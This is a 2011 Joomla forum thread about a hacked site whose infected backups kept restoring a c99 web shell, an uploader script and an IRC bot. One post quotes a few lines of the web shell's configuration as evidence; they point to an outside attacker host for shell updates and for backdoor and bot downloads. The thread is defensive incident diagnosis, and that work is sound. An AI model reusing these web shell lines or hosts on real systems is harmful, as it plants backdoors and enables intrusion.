Malware/Maybe Hack Causing Host Server to Get Overload

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2735
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by PhilD » Sat Jun 04, 2011 3:18 pm

@webdongle etc..

"You also need to remove every file, cron job, sub domains, directories, etc. from your domain."
"mmmmmmmm, me thought that was done in the first place"

Site was restored from site backups which are infected.

I've downloaded the backups I have from cPanel, unzipped them and scanned them with Norton anti-virus (I'm on a Mac). I did the same with the public_HTML folder. The backups had trojans,

Take a closer look at some of the posts. While it is possible that the server has another account hacked, it is likely originating from this account. There are several scripts here

an injector script and an uploader script:

HEX}base64.inject.unclassed.3 : ./media/system/cfg.php
{HEX}php.uploader.max.523 : ./media/system/upload.php

Evidence the hacker messed with or has attempted to mess with the database:

hableda1_jo151.jos_session
warning : Table is marked as crashed
warning : 1 client is using or hasn't closed the table properly
warning : Found 1128996 deleted space in delete link chain. Should be 1167464
error : Found 442 deleted rows in delete link chain. Should be 457

hableda1_jo151.jos_content
warning : 1 client is using or hasn't closed the table properly
status : OK
error : record delete-link-chain corrupted
error : Corrupt

Evidence that hacker has installed or linked to c99, and other scripts:

#$sh_mainurl = "http://localhost/FX29SH/";
$sh_mainurl = "http://uaedesign.com/xml/";
$fx29sh_updateurl = $sh_mainurl."c99_update.php";
$fx29sh_sourcesurl = $sh_mainurl."c99.txt";
$sh_sourcez = array(
"Fx29Sh" => array($sh_mainurl."c99.txt","c99.php"),
"[removed]" => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),

Evidence of IRC installed and active:

A few updates: I've downloaded and scanned my backup that was just generated and this virus was found in the homedir.tar and the hableda1.tar.gz (I scanned both the zipped and unzipped files): backdoor.IRC.bot.

Evidence the attempts to use the site for malware/spam/other purposes continue:

There is a lot of POST requests to the index page from the IP address xxx.xxx.xxx.xxx

These are the reasons I stated what I did as a plan of action.
PhilD

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20518
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by leolam » Sat Jun 04, 2011 4:04 pm

PhilD wrote:These are the reasons I stated what I did as a plan of action.
to which I agree completely and he should change host as well imho despite the host being very helpful. One cannot take the risk after all these events and the experience described to renew a Joomla site with the same host....No offense to the host as such but you simply cannot take the risk as habledash is expressing his own doubts!

@ habledash: No reason for me to take WP over Joomla...makes from a security point of view no difference....Bluehost I would investigate a little bit longer......Contact me via PMB to share some client experiences since I do not wish to get PhilD all over me with "wall of hosting shame" (Sorry Phil..could not resist a little joke.......don't take all too serious.....)

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 41878
Joined: Sat Apr 05, 2008 9:58 pm

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by Webdongle » Sat Jun 04, 2011 5:48 pm

Webdongle wrote:.....

Also some Hosting companies are well known for being hacked on a regular basis
Try a google search for
yourhost hacked
Here are the results
http://www.google.co.uk/search?q=Blueho ... e=off&tbs=
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20518
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by leolam » Sat Jun 04, 2011 5:56 pm

@ Webdongle
With all respect to your intentions and the facts please stay on topic....Your contribution adds to a "wall of shame" which does not belong in this thread.....

If you like to open a thread about experiences with whatever host feel free and it will be welcomed since these issues are important......However placing them in this thread is beyond topic imho

I restrained as you can see from my post...no need at all to do links to that particular host in thed thread (!)

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 41878
Joined: Sat Apr 05, 2008 9:58 pm

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by Webdongle » Sat Jun 04, 2011 6:39 pm

leolam wrote:....
With all respect to your intentions and the facts please stay on topic....Your contribution adds to a "wall of shame" which does not belong in this thread.....
....
IMHO it is on topic an is not a 'Hall of shame' it is part of a diagnostic process. "Once you eliminate the impossible, whatever remains, no matter how improbable, must be the truth." Sir Arthur Conan Doyle.

The OP has eliminated everything else a search on his Host with the word 'Hacked' is that which remained. The search linked to, was the next step in the process of elimination. Pasting the link does not name and shame because it makes no conclusion about the Host. It merely shows a link to the results of such a search. Therefore it is part of the analytical process an not a hall of shame. And as such is very relevant to the thread.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

randelld
Joomla! Explorer
Joomla! Explorer
Posts: 418
Joined: Thu Jan 31, 2008 8:45 am

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by randelld » Sat Jun 04, 2011 9:16 pm

I think Webdongle was right to post the above link. I definitely is relevant in with regard to the OP making a decision to change hosts or not.
It looks pretty conclusive in my opinion what the next step should be.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2735
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by PhilD » Sun Jun 12, 2011 12:35 pm

The Op had active on the domain a c99 script variant, an uploader script and an eggdrop script. The site had backups, both by the host and by the individual. However, these backups were all infected with the above scripts. The site has been cleaned, a much better host (mod_security etc.) has been selected to host the site, and the site is being monitored.

The database errors and other database issues were due to an excessively large sessions table. This has also been taken care of.

Edit: The host also was not BlueHost
PhilD


Locked

Return to “Security in Joomla! 1.5”